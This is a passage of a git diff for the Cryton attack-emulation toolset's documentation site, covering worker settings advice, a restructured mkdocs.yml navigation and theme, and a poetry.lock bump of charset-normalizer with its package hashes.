+ +## Worker +### Settings +Update these settings to not use the default values + +- CRYTON_WORKER_NAME +- CRYTON_WORKER_MODULES_DIR +- CRYTON_WORKER_MSFRPCD_PASSWORD +- CRYTON_WORKER_RABBIT_PASSWORD +- CRYTON_WORKER_EMPIRE_PASSWORD diff --git a/mkdocs.yml b/mkdocs.yml index 33ecb9eb29673dbaf760d2c1ae7ae5fd49cb547f..e67bebabb72e4684274ae2b26a96a57854fc55ee 100644 --- a/mkdocs.yml +++ b/mkdocs.yml @@ -1,63 +1,108 @@ site_name: Cryton toolset site_url: https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/ +repo_url: https://gitlab.ics.muni.cz/cryton theme: name: material locale: en custom_dir: docs/overrides palette: - primary: indigo + - scheme: slate + primary: indigo + accent: indigo + toggle: + icon: material/brightness-4 + name: Switch to light mode + - scheme: default + primary: indigo + accent: indigo + toggle: + icon: material/brightness-7 + name: Switch to dark mode + + features: + - content.tabs.link # Linked code tabs + - content.code.copy # Code copy button + - navigation.tracking # Anchor tracking + - navigation.top # Back-to-top button + - search.highlight # Highlight searched terms + - toc.follow extra: version: provider: mike +markdown_extensions: + - pymdownx.superfences: + custom_fences: + - name: mermaid + class: mermaid + format: !!python/name:pymdownx.superfences.fence_code_format + - pymdownx.tabbed: + alternate_style: true + - toc: + permalink: true + - admonition + - pymdownx.details + - attr_list + +plugins: + - search: + lang: en + - macros: + j2_block_start_string: "{{{%" + j2_block_end_string: "%}}}" + j2_variable_start_string: "{{{" + j2_variable_end_string: "}}}" + include_yaml: + - docs/extra/variables.yml + on_error_fail: true + - include-markdown: + opening_tag: "{!" 
+ closing_tag: "!}" + nav: - - Home: index.md - - Architecture: 2022.2/architecture.md - - Starting point: - - Core: 2022.2/starting-point/core.md - - Worker: 2022.2/starting-point/worker.md - - Modules: 2022.2/starting-point/modules.md - - CLI: 2022.2/starting-point/cli.md - - Frontend: 2022.2/starting-point/frontend.md - - Deployment with Ansible: 2022.2/starting-point/ansible.md - - Testing environment: 2022.2/starting-point/testing-environment.md + - Introduction: index.md + - Architecture: architecture.md - Getting started: - - Local deployment: 2022.2/getting-started/installation-example.md - - Simple Workflow: 2022.2/getting-started/workflow-example.md + - Quick-start: getting-started/quick-start.md + - Workflow: getting-started/workflow.md + - Execution example: getting-started/execution-example.md +# - Deployment with Ansible: getting-started/ansible.md +# - Testing environment: getting-started/playground.md + - Components: + - Core: components/core.md + - Worker: components/worker.md + - Modules: components/modules.md + - CLI: components/cli.md + - Frontend: components/frontend.md - Designing phase: - - What is an attack scenario: 2022.2/designing-phase/what-is-attack-scenario.md - - Template: - - What is a template: 2022.2/designing-phase/template.md - - Plan: 2022.2/designing-phase/plan.md - - Stage: 2022.2/designing-phase/stage.md - - Step: 2022.2/designing-phase/step.md - - Plan instance: 2022.2/designing-phase/plan-instance.md - - Session management: 2022.2/designing-phase/session-management.md + - Template (attack scenario): designing-phase/template.md + - Plan: designing-phase/plan.md + - Stage: designing-phase/stage.md + - Step: designing-phase/step.md + - Plan instance: designing-phase/plan-instance.md - Execution phase: - - What is Run: 2022.2/execution-phase/run.md - - Execution statistics: 2022.2/execution-phase/execution.md - - Reporting: 2022.2/execution-phase/reporting.md + - What is Run: execution-phase/run.md + - Execution statistics: 
execution-phase/execution.md + - Reporting: execution-phase/reporting.md - Interfaces: - - CLI: 2022.2/interfaces/cli.md - - Frontend: 2022.2/interfaces/frontend.md - - Core (REST API): 2022.2/interfaces/core-rest-api.md - - Worker (Rabbit API): 2022.2/interfaces/worker-rabbit-api.md - - Attack modules: - - How to create an attack module: 2022.2/modules/howto-create-attack-modules.md - - Modules: - - mod_cmd: 2022.2/modules/mod_cmd.md - - mod_medusa: 2022.2/modules/mod_medusa.md - - mod_msf: 2022.2/modules/mod_msf.md - - mod_nmap: 2022.2/modules/mod_nmap.md - - mod_script: 2022.2/modules/mod_script.md - - mod_wpscan: 2022.2/modules/mod_wpscan.md + - CLI: interfaces/cli.md + - Frontend: interfaces/frontend.md + - Core (REST API): interfaces/core-rest-api.md + - Worker (Rabbit API): interfaces/worker-rabbit-api.md - Integrated tools: - - Metasploit: 2022.2/integrated-tools/metasploit.md - - Empire: 2022.2/integrated-tools/empire.md - - Dynamic execution: 2022.2/dynamic-execution.md - - Logging: 2022.2/logging.md + - Metasploit: integrated-tools/metasploit.md + - Empire: integrated-tools/empire.md + - Production: production.md + - Dynamic execution: dynamic-execution.md + - Logging: logging.md - How to contribute: contribution-guide.md + - Development: + - Core: development/core.md + - Worker: development/worker.md + - Modules: development/modules.md + - CLI: development/cli.md + - Frontend: development/frontend.md - Acknowledgements: acknowledgements.md - - License: license.md + - License: license.md diff --git a/poetry.lock b/poetry.lock index fc10207fe614d950839d39ac250ba80d42f7390c..75e17b35917ecdd02b0a4a11c413777b10392662 100644 --- a/poetry.lock +++ b/poetry.lock @@ -14,100 +14,87 @@ files = [ [[package]] name = "charset-normalizer" -version = "3.0.1" +version = "3.1.0" description = "The Real First Universal Charset Detector. Open, modern and actively maintained alternative to Chardet." 
category = "main" optional = false -python-versions = "*" +python-versions = ">=3.7.0" files = [ - {file = "charset-normalizer-3.0.1.tar.gz", hash = "sha256:ebea339af930f8ca5d7a699b921106c6e29c617fe9606fa7baa043c1cdae326f"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:88600c72ef7587fe1708fd242b385b6ed4b8904976d5da0893e31df8b3480cb6"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c75ffc45f25324e68ab238cb4b5c0a38cd1c3d7f1fb1f72b5541de469e2247db"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:db72b07027db150f468fbada4d85b3b2729a3db39178abf5c543b784c1254539"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:62595ab75873d50d57323a91dd03e6966eb79c41fa834b7a1661ed043b2d404d"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:ff6f3db31555657f3163b15a6b7c6938d08df7adbfc9dd13d9d19edad678f1e8"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:772b87914ff1152b92a197ef4ea40efe27a378606c39446ded52c8f80f79702e"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:70990b9c51340e4044cfc394a81f614f3f90d41397104d226f21e66de668730d"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:292d5e8ba896bbfd6334b096e34bffb56161c81408d6d036a7dfa6929cff8783"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:2edb64ee7bf1ed524a1da60cdcd2e1f6e2b4f66ef7c077680739f1641f62f555"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:31a9ddf4718d10ae04d9b18801bd776693487cbb57d74cc3458a7673f6f34639"}, - {file = 
"charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:44ba614de5361b3e5278e1241fda3dc1838deed864b50a10d7ce92983797fa76"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:12db3b2c533c23ab812c2b25934f60383361f8a376ae272665f8e48b88e8e1c6"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:c512accbd6ff0270939b9ac214b84fb5ada5f0409c44298361b2f5e13f9aed9e"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-win32.whl", hash = "sha256:502218f52498a36d6bf5ea77081844017bf7982cdbe521ad85e64cabee1b608b"}, - {file = "charset_normalizer-3.0.1-cp310-cp310-win_amd64.whl", hash = "sha256:601f36512f9e28f029d9481bdaf8e89e5148ac5d89cffd3b05cd533eeb423b59"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:0298eafff88c99982a4cf66ba2efa1128e4ddaca0b05eec4c456bbc7db691d8d"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:a8d0fc946c784ff7f7c3742310cc8a57c5c6dc31631269876a88b809dbeff3d3"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:87701167f2a5c930b403e9756fab1d31d4d4da52856143b609e30a1ce7160f3c"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14e76c0f23218b8f46c4d87018ca2e441535aed3632ca134b10239dfb6dadd6b"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:0c0a590235ccd933d9892c627dec5bc7511ce6ad6c1011fdf5b11363022746c1"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:8c7fe7afa480e3e82eed58e0ca89f751cd14d767638e2550c77a92a9e749c317"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:79909e27e8e4fcc9db4addea88aa63f6423ebb171db091fb4373e3312cb6d603"}, - {file = 
"charset_normalizer-3.0.1-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8ac7b6a045b814cf0c47f3623d21ebd88b3e8cf216a14790b455ea7ff0135d18"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:72966d1b297c741541ca8cf1223ff262a6febe52481af742036a0b296e35fa5a"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:f9d0c5c045a3ca9bedfc35dca8526798eb91a07aa7a2c0fee134c6c6f321cbd7"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:5995f0164fa7df59db4746112fec3f49c461dd6b31b841873443bdb077c13cfc"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:4a8fcf28c05c1f6d7e177a9a46a1c52798bfe2ad80681d275b10dcf317deaf0b"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:761e8904c07ad053d285670f36dd94e1b6ab7f16ce62b9805c475b7aa1cffde6"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-win32.whl", hash = "sha256:71140351489970dfe5e60fc621ada3e0f41104a5eddaca47a7acb3c1b851d6d3"}, - {file = "charset_normalizer-3.0.1-cp311-cp311-win_amd64.whl", hash = "sha256:9ab77acb98eba3fd2a85cd160851816bfce6871d944d885febf012713f06659c"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:84c3990934bae40ea69a82034912ffe5a62c60bbf6ec5bc9691419641d7d5c9a"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:74292fc76c905c0ef095fe11e188a32ebd03bc38f3f3e9bcb85e4e6db177b7ea"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c95a03c79bbe30eec3ec2b7f076074f4281526724c8685a42872974ef4d36b72"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f4c39b0e3eac288fedc2b43055cfc2ca7a60362d0e5e87a637beac5d801ef478"}, - {file = 
"charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:df2c707231459e8a4028eabcd3cfc827befd635b3ef72eada84ab13b52e1574d"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:93ad6d87ac18e2a90b0fe89df7c65263b9a99a0eb98f0a3d2e079f12a0735837"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:59e5686dd847347e55dffcc191a96622f016bc0ad89105e24c14e0d6305acbc6"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:cd6056167405314a4dc3c173943f11249fa0f1b204f8b51ed4bde1a9cd1834dc"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:083c8d17153ecb403e5e1eb76a7ef4babfc2c48d58899c98fcaa04833e7a2f9a"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_s390x.whl", hash = "sha256:f5057856d21e7586765171eac8b9fc3f7d44ef39425f85dbcccb13b3ebea806c"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:7eb33a30d75562222b64f569c642ff3dc6689e09adda43a082208397f016c39a"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-win32.whl", hash = "sha256:95dea361dd73757c6f1c0a1480ac499952c16ac83f7f5f4f84f0658a01b8ef41"}, - {file = "charset_normalizer-3.0.1-cp36-cp36m-win_amd64.whl", hash = "sha256:eaa379fcd227ca235d04152ca6704c7cb55564116f8bc52545ff357628e10602"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:3e45867f1f2ab0711d60c6c71746ac53537f1684baa699f4f668d4c6f6ce8e14"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cadaeaba78750d58d3cc6ac4d1fd867da6fc73c88156b7a3212a3cd4819d679d"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:911d8a40b2bef5b8bbae2e36a0b103f142ac53557ab421dc16ac4aafee6f53dc"}, - {file = 
"charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:503e65837c71b875ecdd733877d852adbc465bd82c768a067badd953bf1bc5a3"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a60332922359f920193b1d4826953c507a877b523b2395ad7bc716ddd386d866"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:16a8663d6e281208d78806dbe14ee9903715361cf81f6d4309944e4d1e59ac5b"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:a16418ecf1329f71df119e8a65f3aa68004a3f9383821edcb20f0702934d8087"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:9d9153257a3f70d5f69edf2325357251ed20f772b12e593f3b3377b5f78e7ef8"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:02a51034802cbf38db3f89c66fb5d2ec57e6fe7ef2f4a44d070a593c3688667b"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:2e396d70bc4ef5325b72b593a72c8979999aa52fb8bcf03f701c1b03e1166918"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:11b53acf2411c3b09e6af37e4b9005cba376c872503c8f28218c7243582df45d"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-win32.whl", hash = "sha256:0bf2dae5291758b6f84cf923bfaa285632816007db0330002fa1de38bfcb7154"}, - {file = "charset_normalizer-3.0.1-cp37-cp37m-win_amd64.whl", hash = "sha256:2c03cc56021a4bd59be889c2b9257dae13bf55041a3372d3295416f86b295fb5"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:024e606be3ed92216e2b6952ed859d86b4cfa52cd5bc5f050e7dc28f9b43ec42"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:4b0d02d7102dd0f997580b51edc4cebcf2ab6397a7edf89f1c73b586c614272c"}, - {file = 
"charset_normalizer-3.0.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:358a7c4cb8ba9b46c453b1dd8d9e431452d5249072e4f56cfda3149f6ab1405e"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:81d6741ab457d14fdedc215516665050f3822d3e56508921cc7239f8c8e66a58"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8b8af03d2e37866d023ad0ddea594edefc31e827fee64f8de5611a1dbc373174"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:9cf4e8ad252f7c38dd1f676b46514f92dc0ebeb0db5552f5f403509705e24753"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e696f0dd336161fca9adbb846875d40752e6eba585843c768935ba5c9960722b"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c22d3fe05ce11d3671297dc8973267daa0f938b93ec716e12e0f6dee81591dc1"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:109487860ef6a328f3eec66f2bf78b0b72400280d8f8ea05f69c51644ba6521a"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:37f8febc8ec50c14f3ec9637505f28e58d4f66752207ea177c1d67df25da5aed"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f97e83fa6c25693c7a35de154681fcc257c1c41b38beb0304b9c4d2d9e164479"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:a152f5f33d64a6be73f1d30c9cc82dfc73cec6477ec268e7c6e4c7d23c2d2291"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:39049da0ffb96c8cbb65cbf5c5f3ca3168990adf3551bd1dee10c48fce8ae820"}, - {file = "charset_normalizer-3.0.1-cp38-cp38-win32.whl", hash = "sha256:4457ea6774b5611f4bed5eaa5df55f70abde42364d498c5134b7ef4c6958e20e"}, - {file = 
"charset_normalizer-3.0.1-cp38-cp38-win_amd64.whl", hash = "sha256:e62164b50f84e20601c1ff8eb55620d2ad25fb81b59e3cd776a1902527a788af"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_10_9_universal2.whl", hash = "sha256:8eade758719add78ec36dc13201483f8e9b5d940329285edcd5f70c0a9edbd7f"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:8499ca8f4502af841f68135133d8258f7b32a53a1d594aa98cc52013fff55678"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:3fc1c4a2ffd64890aebdb3f97e1278b0cc72579a08ca4de8cd2c04799a3a22be"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:00d3ffdaafe92a5dc603cb9bd5111aaa36dfa187c8285c543be562e61b755f6b"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:c2ac1b08635a8cd4e0cbeaf6f5e922085908d48eb05d44c5ae9eabab148512ca"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f6f45710b4459401609ebebdbcfb34515da4fc2aa886f95107f556ac69a9147e"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3ae1de54a77dc0d6d5fcf623290af4266412a7c4be0b1ff7444394f03f5c54e3"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:3b590df687e3c5ee0deef9fc8c547d81986d9a1b56073d82de008744452d6541"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ab5de034a886f616a5668aa5d098af2b5385ed70142090e2a31bcbd0af0fdb3d"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:9cb3032517f1627cc012dbc80a8ec976ae76d93ea2b5feaa9d2a5b8882597579"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:608862a7bf6957f2333fc54ab4399e405baad0163dc9f8d99cb236816db169d4"}, - {file 
= "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_s390x.whl", hash = "sha256:0f438ae3532723fb6ead77e7c604be7c8374094ef4ee2c5e03a3a17f1fca256c"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:356541bf4381fa35856dafa6a965916e54bed415ad8a24ee6de6e37deccf2786"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-win32.whl", hash = "sha256:39cf9ed17fe3b1bc81f33c9ceb6ce67683ee7526e65fde1447c772afc54a1bb8"}, - {file = "charset_normalizer-3.0.1-cp39-cp39-win_amd64.whl", hash = "sha256:0a11e971ed097d24c534c037d298ad32c6ce81a45736d31e0ff0ad37ab437d59"}, - {file = "charset_normalizer-3.0.1-py3-none-any.whl", hash = "sha256:7e189e2e1d3ed2f4aebabd2d5b0f931e883676e51c7624826e0a4e5fe8a0bf24"}, + {file = "charset-normalizer-3.1.0.tar.gz", hash = "sha256:34e0a2f9c370eb95597aae63bf85eb5e96826d81e3dcf88b8886012906f509b5"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:e0ac8959c929593fee38da1c2b64ee9778733cdf03c482c9ff1d508b6b593b2b"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d7fc3fca01da18fbabe4625d64bb612b533533ed10045a2ac3dd194bfa656b60"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:04eefcee095f58eaabe6dc3cc2262f3bcd776d2c67005880894f447b3f2cb9c1"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:20064ead0717cf9a73a6d1e779b23d149b53daf971169289ed2ed43a71e8d3b0"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1435ae15108b1cb6fffbcea2af3d468683b7afed0169ad718451f8db5d1aff6f"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:c84132a54c750fda57729d1e2599bb598f5fa0344085dbde5003ba429a4798c0"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = 
"sha256:75f2568b4189dda1c567339b48cba4ac7384accb9c2a7ed655cd86b04055c795"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:11d3bcb7be35e7b1bba2c23beedac81ee893ac9871d0ba79effc7fc01167db6c"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:891cf9b48776b5c61c700b55a598621fdb7b1e301a550365571e9624f270c203"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:5f008525e02908b20e04707a4f704cd286d94718f48bb33edddc7d7b584dddc1"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:b06f0d3bf045158d2fb8837c5785fe9ff9b8c93358be64461a1089f5da983137"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:49919f8400b5e49e961f320c735388ee686a62327e773fa5b3ce6721f7e785ce"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:22908891a380d50738e1f978667536f6c6b526a2064156203d418f4856d6e86a"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-win32.whl", hash = "sha256:12d1a39aa6b8c6f6248bb54550efcc1c38ce0d8096a146638fd4738e42284448"}, + {file = "charset_normalizer-3.1.0-cp310-cp310-win_amd64.whl", hash = "sha256:65ed923f84a6844de5fd29726b888e58c62820e0769b76565480e1fdc3d062f8"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:9a3267620866c9d17b959a84dd0bd2d45719b817245e49371ead79ed4f710d19"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:6734e606355834f13445b6adc38b53c0fd45f1a56a9ba06c2058f86893ae8017"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:f8303414c7b03f794347ad062c0516cee0e15f7a612abd0ce1e25caf6ceb47df"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:aaf53a6cebad0eae578f062c7d462155eada9c172bd8c4d250b8c1d8eb7f916a"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3dc5b6a8ecfdc5748a7e429782598e4f17ef378e3e272eeb1340ea57c9109f41"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:e1b25e3ad6c909f398df8921780d6a3d120d8c09466720226fc621605b6f92b1"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0ca564606d2caafb0abe6d1b5311c2649e8071eb241b2d64e75a0d0065107e62"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b82fab78e0b1329e183a65260581de4375f619167478dddab510c6c6fb04d9b6"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:bd7163182133c0c7701b25e604cf1611c0d87712e56e88e7ee5d72deab3e76b5"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:11d117e6c63e8f495412d37e7dc2e2fff09c34b2d09dbe2bee3c6229577818be"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:cf6511efa4801b9b38dc5546d7547d5b5c6ef4b081c60b23e4d941d0eba9cbeb"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:abc1185d79f47c0a7aaf7e2412a0eb2c03b724581139193d2d82b3ad8cbb00ac"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:cb7b2ab0188829593b9de646545175547a70d9a6e2b63bf2cd87a0a391599324"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-win32.whl", hash = "sha256:c36bcbc0d5174a80d6cccf43a0ecaca44e81d25be4b7f90f0ed7bcfbb5a00909"}, + {file = "charset_normalizer-3.1.0-cp311-cp311-win_amd64.whl", hash = "sha256:cca4def576f47a09a943666b8f829606bcb17e2bc2d5911a46c8f8da45f56755"}, + {file = "charset_normalizer-3.1.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = 
